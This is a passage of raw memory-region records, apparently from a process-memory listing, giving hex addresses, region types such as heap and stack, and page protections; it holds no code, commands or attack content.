page execute and read and write
7FFEB8800000
trusted library allocation
page read and write
61BE000
stack
page read and write
227B810C000
heap
page read and write
18D22FE000
stack
page read and write
F43B0FE000
unkown
page readonly
1402000
trusted library allocation
page read and write
2F81000
trusted library allocation
page read and write
7FFEB8AA0000
trusted library allocation
page read and write
5950000
trusted library allocation
page read and write
16B0000
trusted library section
page read and write
1B32E000
stack
page read and write
227B8ED6000
heap
page read and write
7FFEB8A20000
trusted library allocation
page read and write
F43ACFE000
stack
page read and write
24F94624000
heap
page read and write
227B8E00000
heap
page read and write
22170C00000
heap
page read and write
227B8EFD000
heap
page read and write
13ED000
trusted library allocation
page execute and read and write
AB2347D000
stack
page read and write
37CE000
stack
page read and write
212B33D2000
trusted library allocation
page read and write
9B0000
heap
page read and write
7FFEB880D000
trusted library allocation
page execute and read and write
267EA780000
trusted library allocation
page read and write
267EA800000
heap
page read and write
2E70000
trusted library allocation
page read and write
1B4C7000
heap
page read and write
267EA813000
heap
page read and write
212A3A4E000
trusted library allocation
page read and write
17F979E0000
heap
page read and write
AB2357E000
stack
page read and write
227B8113000
heap
page read and write
2A40000
heap
page execute and read and write
4C60000
trusted library allocation
page read and write
CF61D7B000
stack
page read and write
12E9000
heap
page read and write
7FFEB8814000
trusted library allocation
page read and write
AB2327D000
stack
page read and write
1B6F2000
heap
page read and write
AB2367E000
stack
page read and write
D03000
heap
page read and write
319A000
trusted library allocation
page read and write
212BEEE0000
heap
page read and write
BEC000
stack
page read and write
804000
unkown
page write copy
212A1470000
heap
page read and write
7FFEB87F0000
trusted library allocation
page read and write
212BD584000
heap
page read and write
9AF027E000
unkown
page readonly
CF6157E000
unkown
page readonly
17F97C80000
heap
page read and write
24F94670000
heap
page read and write
7FFEB89F0000
trusted library allocation
page read and write
212BEF24000
heap
page read and write
7FFEB89F6000
trusted library allocation
page read and write
7FFEB87F4000
trusted library allocation
page read and write
7FFEB8804000
trusted library allocation
page read and write
212BBFFF000
heap
page read and write
E85000
heap
page read and write
1B469000
heap
page read and write
22170465000
heap
page read and write
227B8F02000
heap
page read and write
7FFEB8B74000
trusted library allocation
page read and write
212BF052000
heap
page read and write
17ED000
stack
page read and write
AB2337D000
stack
page read and write
4D9D000
stack
page read and write
227B787D000
heap
page read and write
3182000
trusted library allocation
page read and write
F43B2FE000
unkown
page readonly
F43ADFE000
unkown
page readonly
DD0000
heap
page read and write
E6E000
stack
page read and write
16E4000
trusted library allocation
page read and write
45B7000
trusted library allocation
page read and write
7FFEB8B80000
trusted library allocation
page read and write
212A341C000
trusted library allocation
page read and write
212BD667000
heap
page read and write
212A329F000
trusted library allocation
page read and write
1B439000
heap
page read and write
227B811A000
heap
page read and write
33B6000
trusted library allocation
page read and write
7FFEB87FD000
trusted library allocation
page execute and read and write
24F94648000
heap
page read and write
212A3944000
trusted library allocation
page read and write
7FFEB880D000
trusted library allocation
page execute and read and write
D90000
heap
page read and write
7FFEB87FD000
trusted library allocation
page execute and read and write
7FFEB88D6000
trusted library allocation
page execute and read and write
227B7895000
heap
page read and write
1C80D000
stack
page read and write
10D4000
heap
page read and write
212BB9C3000
heap
page read and write
1727000
trusted library allocation
page execute and read and write
1F7E000
stack
page read and write
24F94641000
heap
page read and write
1B4E5000
heap
page read and write
212A1650000
heap
page read and write
10D0000
trusted library section
page read and write
1F8A4E02000
heap
page read and write
DF0000
heap
page read and write
12EE000
stack
page read and write
7FFEB89B0000
trusted library allocation
page read and write
212A16AC000
heap
page read and write
7FFEB87E4000
trusted library allocation
page read and write
22170C15000
heap
page read and write
CF6098B000
stack
page read and write
1AEED000
stack
page read and write
AE4000
heap
page read and write
227B8D20000
trusted library allocation
page read and write
1B484000
heap
page read and write
7FFEB88A0000
trusted library allocation
page read and write
4C40000
trusted library allocation
page read and write
7FFEB8A50000
trusted library allocation
page read and write
250000
unkown
page readonly
7FFEB8C90000
trusted library allocation
page read and write
1B62E000
stack
page read and write
212B34A0000
trusted library allocation
page read and write
227B8F1B000
heap
page read and write
F43A47D000
stack
page read and write
7FFEB8B8C000
trusted library allocation
page read and write
24F94654000
heap
page read and write
AB2397E000
stack
page read and write
10FD000
stack
page read and write
13E4000
trusted library allocation
page read and write
1B3B0000
trusted library allocation
page read and write
7FFEB88AC000
trusted library allocation
page execute and read and write
F43AEFD000
stack
page read and write
24F94630000
heap
page read and write
1B520000
heap
page read and write
2E72000
unkown
page readonly
1B72E000
stack
page read and write
212F000
trusted library allocation
page read and write
212BD55B000
heap
page read and write
1BDCA000
heap
page read and write
1309000
heap
page read and write
DD0000
heap
page read and write
9AEFDEE000
stack
page read and write
212A3210000
heap
page execute and read and write
212BEFED000
heap
page read and write
13F0000
trusted library allocation
page read and write
212A3473000
trusted library allocation
page read and write
212BEFF6000
heap
page read and write
A30000
heap
page read and write
3442000
trusted library allocation
page read and write
7FFEB8A5D000
trusted library allocation
page read and write
5AFD000
stack
page read and write
212B3449000
trusted library allocation
page read and write
CF61C7E000
unkown
page readonly
24F94673000
heap
page read and write
30F8000
trusted library allocation
page read and write
804000
unkown
page read and write
212A1736000
heap
page read and write
45C1000
trusted library allocation
page read and write
24F9469D000
heap
page read and write
212BD62A000
heap
page read and write
251000
unkown
page execute read
2A71000
trusted library allocation
page read and write
2940000
heap
page execute and read and write
CF6277E000
stack
page read and write
1C616000
stack
page read and write
2E90000
trusted library allocation
page read and write
227B7913000
heap
page read and write
24F9469F000
heap
page read and write
7FFEB8991000
trusted library allocation
page read and write
227B8F14000
heap
page read and write
9CD3FFE000
unkown
page readonly
CA0000
heap
page read and write
1B524000
heap
page read and write
7FFEB8A70000
trusted library allocation
page read and write
7FFEB87E0000
trusted library allocation
page read and write
24F94695000
heap
page read and write
227B8640000
trusted library allocation
page read and write
1B6B0000
heap
page read and write
7FFEB89EC000
trusted library allocation
page read and write
1BD8D000
heap
page read and write
2A5F000
trusted library allocation
page read and write
C00000
heap
page read and write
1315000
heap
page read and write
4500000
trusted library allocation
page read and write
56C0000
trusted library allocation
page execute and read and write
16B5000
heap
page read and write
1F8A4C90000
heap
page read and write
212A3986000
trusted library allocation
page read and write
227BD090000
trusted library allocation
page read and write
212BEF4C000
heap
page read and write
D8B000
heap
page read and write
7FFEB8A30000
trusted library allocation
page read and write
199F000
stack
page read and write
24F94665000
heap
page read and write
AEE000
heap
page read and write
7FFEB88A6000
trusted library allocation
page read and write
10B0000
heap
page read and write
4C50000
trusted library allocation
page read and write
212BB250000
trusted library allocation
page read and write
1600000
heap
page read and write
3183000
trusted library allocation
page read and write
7FFEB8B80000
trusted library allocation
page read and write
1660000
trusted library allocation
page read and write
1B44C000
heap
page read and write
E77000
heap
page read and write
CF61AFE000
stack
page read and write
7FF44FFC0000
trusted library allocation
page execute and read and write
D2B000
heap
page read and write
212A346A000
trusted library allocation
page read and write
1707000
heap
page read and write
E8B000
heap
page read and write
327E000
stack
page read and write
7FFEB8910000
trusted library allocation
page execute and read and write
267EA822000
heap
page read and write
7FFEB89B2000
trusted library allocation
page read and write
221703A0000
trusted library allocation
page read and write
1BEB0000
heap
page read and write
147E000
stack
page read and write
7FFEB8A06000
trusted library allocation
page read and write
D73000
heap
page read and write
1B8C0000
unkown
page readonly
4590000
trusted library allocation
page execute and read and write
7FFEB8B70000
trusted library allocation
page read and write
7FFEB8C00000
trusted library allocation
page read and write
D86000
heap
page read and write
212A346F000
trusted library allocation
page read and write
CF6197E000
unkown
page readonly
227B78DC000
heap
page read and write
10E0000
heap
page read and write
806000
unkown
page readonly
212A1570000
heap
page read and write
24F9466B000
heap
page read and write
7FFEB8920000
trusted library allocation
page execute and read and write
1367000
heap
page read and write
261000
unkown
page read and write
9AF077E000
stack
page read and write
1239000
heap
page read and write
C5C000
stack
page read and write
212A1750000
trusted library allocation
page read and write
9CD39FE000
unkown
page readonly
B26000
heap
page read and write
212BBFEB000
heap
page read and write
7FFEB8B60000
trusted library allocation
page read and write
7FFEB881A000
trusted library allocation
page read and write
1D2E0000
heap
page read and write
24F94657000
heap
page read and write
212A398A000
trusted library allocation
page read and write
24F9464C000
heap
page read and write
1F8A4E34000
heap
page read and write
212BBFDF000
heap
page read and write
F43AFFE000
unkown
page readonly
1BD72000
heap
page read and write
1415000
trusted library allocation
page execute and read and write
1BB00000
unkown
page readonly
1673000
trusted library allocation
page read and write
212A36CE000
trusted library allocation
page read and write
172B000
trusted library allocation
page execute and read and write
D66000
heap
page read and write
227BE000000
heap
page read and write
227B8EF0000
heap
page read and write
7FFEB8CB0000
trusted library allocation
page execute and read and write
1B74B000
heap
page read and write
213C000
trusted library allocation
page read and write
4C00000
trusted library allocation
page read and write
7FFEB889C000
trusted library allocation
page execute and read and write
1BDCD000
heap
page read and write
EAE000
stack
page read and write
CF60F7E000
unkown
page readonly
24F946A4000
heap
page read and write
7FFEB8A76000
trusted library allocation
page read and write
CF6237E000
unkown
page readonly
1E70000
heap
page read and write
1F8A4E7F000
heap
page read and write
24F94660000
heap
page read and write
1BEB5000
heap
page read and write
7FFEB8813000
trusted library allocation
page read and write
1AFDD000
stack
page read and write
7FFEB8A50000
trusted library allocation
page read and write
780000
unkown
page readonly
9CD3EFE000
stack
page read and write
227BD080000
trusted library allocation
page read and write
7FFEB8810000
trusted library allocation
page read and write
227B8ED8000
heap
page read and write
1F8A4CB0000
heap
page read and write
1B82E000
stack
page read and write
9CD3DFE000
unkown
page readonly
1700000
heap
page read and write
22170400000
heap
page read and write
227B8EF4000
heap
page read and write
2C44000
trusted library allocation
page read and write
227B8E69000
heap
page read and write
13D8000
heap
page read and write
7FFEB8A00000
trusted library allocation
page read and write
1BC9F000
stack
page read and write
781000
stack
page read and write
267EC402000
trusted library allocation
page read and write
212A16D5000
heap
page read and write
10F1000
stack
page read and write
7FFEB8995000
trusted library allocation
page read and write
212A347B000
trusted library allocation
page read and write
28C0000
unkown
page readonly
43E6000
trusted library allocation
page read and write
17F97A18000
heap
page read and write
267EA840000
heap
page read and write
7FFEB8A30000
trusted library allocation
page read and write
212BD747000
heap
page read and write
212BD560000
heap
page read and write
24F9466D000
heap
page read and write
CE9000
heap
page read and write
227B8EE8000
heap
page read and write
2E80000
trusted library allocation
page read and write
7FFEB8B50000
trusted library allocation
page read and write
1F8A4E60000
heap
page read and write
DD5000
heap
page read and write
227B8100000
heap
page read and write
7FFEB89DE000
trusted library allocation
page read and write
1C90E000
stack
page read and write
227B8F4D000
heap
page read and write
7FFEB89A3000
trusted library allocation
page read and write
1B455000
heap
page read and write
1B6B6000
heap
page read and write
212BC115000
heap
page read and write
24F94649000
heap
page read and write
24F94702000
heap
page read and write
F43A9FE000
unkown
page readonly
227B78BA000
heap
page read and write
7FFEB89D8000
trusted library allocation
page read and write
22170370000
heap
page read and write
212BB95F000
heap
page read and write
212BEFF0000
heap
page read and write
34EE000
stack
page read and write
227B8F40000
heap
page read and write
1410000
trusted library allocation
page read and write
18D1F8E000
stack
page read and write
25B000
unkown
page readonly
212A397A000
trusted library allocation
page read and write
7FFEB8A60000
trusted library allocation
page read and write
F10000
heap
page read and write
5402000
unkown
page readonly
106E000
stack
page read and write
1BDC3000
heap
page read and write
AB2377F000
stack
page read and write
12CD000
heap
page read and write
7FFEB8A40000
trusted library allocation
page read and write
A00000
heap
page read and write
7FFEB89C0000
trusted library allocation
page read and write
9CD37FE000
unkown
page readonly
9D0000
heap
page read and write
7FFEB8B90000
trusted library allocation
page read and write
7FFEB881D000
trusted library allocation
page execute and read and write
7FFEB8B30000
trusted library allocation
page read and write
212A329D000
trusted library allocation
page read and write
212BB9A2000
heap
page read and write
227B78D0000
heap
page read and write
CF61EFE000
stack
page read and write
227BD150000
remote allocation
page read and write
124E000
stack
page read and write
C90000
heap
page read and write
7FFEB882B000
trusted library allocation
page execute and read and write
DC0000
heap
page read and write
212B32BC000
trusted library allocation
page read and write
212BBF90000
heap
page read and write
CF619FE000
stack
page read and write
16E0000
trusted library allocation
page read and write
1C313000
heap
page execute and read and write
7F1000
unkown
page execute read
584E000
stack
page read and write
212BB972000
heap
page read and write
1BBAE000
stack
page read and write
442B000
trusted library allocation
page read and write
4C30000
trusted library allocation
page read and write
4DE0000
trusted library allocation
page read and write
7FFEB89B3000
trusted library allocation
page read and write
C53000
heap
page read and write
267EA740000
heap
page read and write
7FFEB8804000
trusted library allocation
page read and write
1B41E000
stack
page read and write
212A17C0000
heap
page read and write
1390000
heap
page read and write
7FFEB8B00000
trusted library allocation
page read and write
7FFEB8910000
trusted library allocation
page execute and read and write
227B8DC4000
trusted library allocation
page read and write
7FFEB87F3000
trusted library allocation
page execute and read and write
1C057000
heap
page read and write
7FFEB885C000
trusted library allocation
page execute and read and write
227B8DC0000
trusted library allocation
page read and write
DD0000
heap
page read and write
F43A8FE000
stack
page read and write
28F2000
unkown
page readonly
1670000
trusted library allocation
page read and write
2138000
trusted library allocation
page read and write
7FFEB88E6000
trusted library allocation
page execute and read and write
2217042B000
heap
page read and write
212B344C000
trusted library allocation
page read and write
570E000
stack
page read and write
7FFEB8C20000
trusted library allocation
page execute and read and write
212BC002000
heap
page read and write
24F94637000
heap
page read and write
212BB8E0000
heap
page read and write
10EE000
stack
page read and write
7FFEB8BB0000
trusted library allocation
page read and write
1712000
trusted library allocation
page read and write
227B8D90000
trusted library allocation
page read and write
227B811A000
heap
page read and write
F43AB7E000
stack
page read and write
1400000
trusted library allocation
page read and write
227B8E70000
heap
page read and write
142E000
stack
page read and write
4BE0000
trusted library allocation
page read and write
18D1F0C000
stack
page read and write
1BDC8000
heap
page read and write
212A1600000
trusted library allocation
page read and write
15E0000
heap
page read and write
212B3221000
trusted library allocation
page read and write
25B000
unkown
page readonly
227B8DC2000
trusted library allocation
page read and write
1A9E000
stack
page read and write
227B77F0000
heap
page read and write
1B61E000
stack
page read and write
212A1690000
heap
page read and write
212B33C3000
trusted library allocation
page read and write
7FFEB8A20000
trusted library allocation
page execute and read and write
1D1B5000
heap
page read and write
7FFEB89E0000
trusted library allocation
page read and write
1230000
heap
page read and write
212B344F000
trusted library allocation
page read and write
212A1A80000
heap
page read and write
212BEE92000
heap
page read and write
227B8EFB000
heap
page read and write
7FFEB89E8000
trusted library allocation
page read and write
CF6137E000
unkown
page readonly
F43A07B000
stack
page read and write
4429000
trusted library allocation
page read and write
7FFEB88B0000
trusted library allocation
page execute and read and write
29C0000
unkown
page readonly
7FFEB89D0000
trusted library allocation
page read and write
AB229FD000
stack
page read and write
1F8A4E00000
heap
page read and write
227B8F11000
heap
page read and write
7FFEB89E0000
trusted library allocation
page read and write
212BEEBA000
heap
page read and write
24F94673000
heap
page read and write
1722000
trusted library allocation
page read and write
12FC000
heap
page read and write
810000
unkown
page readonly
CF61BFE000
stack
page read and write
227B8DC0000
trusted library allocation
page read and write
7FFEB8B83000
trusted library allocation
page read and write
7FFEB89B6000
trusted library allocation
page read and write
2043000
trusted library allocation
page read and write
212A1677000
heap
page read and write
4BDE000
stack
page read and write
227BD0E0000
trusted library allocation
page read and write
7FFEB8A24000
trusted library allocation
page read and write
E60000
heap
page read and write
4415000
trusted library allocation
page read and write
C50000
heap
page read and write
7FFEB88BC000
trusted library allocation
page execute and read and write
AC7000
heap
page read and write
7FFEB8AD0000
trusted library allocation
page read and write
1C05B000
heap
page read and write
2FE0000
trusted library allocation
page read and write
A80000
trusted library allocation
page read and write
212BD75A000
heap
page read and write
2F28000
trusted library allocation
page read and write
7FFEB8814000
trusted library allocation
page read and write
7FFEB8A40000
trusted library allocation
page read and write
1D6E000
stack
page read and write
212BD67B000
heap
page read and write
227B8F1B000
heap
page read and write
13E0000
trusted library allocation
page read and write
AB22F7E000
stack
page read and write
E4E000
heap
page read and write
7FFEB8990000
trusted library allocation
page read and write
120E000
stack
page read and write
128E000
stack
page read and write
212A1550000
heap
page read and write
7FFEB8A10000
trusted library allocation
page read and write
24F94659000
heap
page read and write
22170490000
heap
page read and write
594B000
stack
page read and write
227B8DB0000
trusted library allocation
page read and write
1DB0000
heap
page execute and read and write
212BD56C000
heap
page read and write
138F000
stack
page read and write
1580000
heap
page read and write
CF62979000
stack
page read and write
178E000
stack
page read and write
22170430000
heap
page read and write
7FFEB8B30000
trusted library allocation
page read and write
18C8000
stack
page read and write
14BE000
stack
page read and write
7FD000
unkown
page readonly
7FFEB8A00000
trusted library allocation
page read and write
227B811A000
heap
page read and write
F6E000
stack
page read and write
1F8A4E6B000
heap
page read and write
7FFEB8A40000
trusted library allocation
page read and write
4A9F000
stack
page read and write
7FFEB89F0000
trusted library allocation
page read and write
7FFEB8A30000
trusted library allocation
page read and write
46B0000
unkown
page readonly
7FFEB8803000
trusted library allocation
page execute and read and write
7FFEB88D6000
trusted library allocation
page execute and read and write
43E2000
trusted library allocation
page read and write
7FFEB89F0000
trusted library allocation
page read and write
227B8E54000
heap
page read and write
2900000
heap
page read and write
7FFEB88C0000
trusted library allocation
page execute and read and write
1306000
heap
page read and write
1BCAE000
stack
page read and write
227B78C6000
heap
page read and write
212A1A85000
heap
page read and write
7FFEB8800000
trusted library allocation
page read and write
2084000
trusted library allocation
page read and write
212A36CC000
trusted library allocation
page read and write
580B000
stack
page read and write
1C310000
heap
page execute and read and write
212A168B000
heap
page read and write
227B7800000
heap
page read and write
212BB8FA000
heap
page read and write
1F8A4E56000
heap
page read and write
1BA90000
heap
page execute and read and write
267EA88C000
heap
page read and write
267EA872000
heap
page read and write
227B7813000
heap
page read and write
7FFEB89F0000
trusted library allocation
page read and write
9AF097E000
stack
page read and write
7FFEB88AC000
trusted library allocation
page execute and read and write
1F8A4D90000
heap
page read and write
F43AAFE000
unkown
page readonly
212BB938000
heap
page read and write
14DE000
stack
page read and write
CF620FB000
stack
page read and write
9CD36F6000
stack
page read and write
AB228FE000
stack
page read and write
AB227FB000
stack
page read and write
212A18A0000
heap
page read and write
13E3000
trusted library allocation
page execute and read and write
7FFEB899C000
trusted library allocation
page read and write
7FFEB89B0000
trusted library allocation
page read and write
1C418000
stack
page read and write
227BD100000
trusted library allocation
page read and write
212BB9AE000
heap
page read and write
7FFEB8A0B000
trusted library allocation
page read and write
7FFEB8A10000
trusted library allocation
page read and write
4630000
unkown
page readonly
7FFEB88B6000
trusted library allocation
page read and write
1B42D000
heap
page read and write
212BD651000
heap
page read and write
1BE50000
trusted library section
page read and write
267EA902000
heap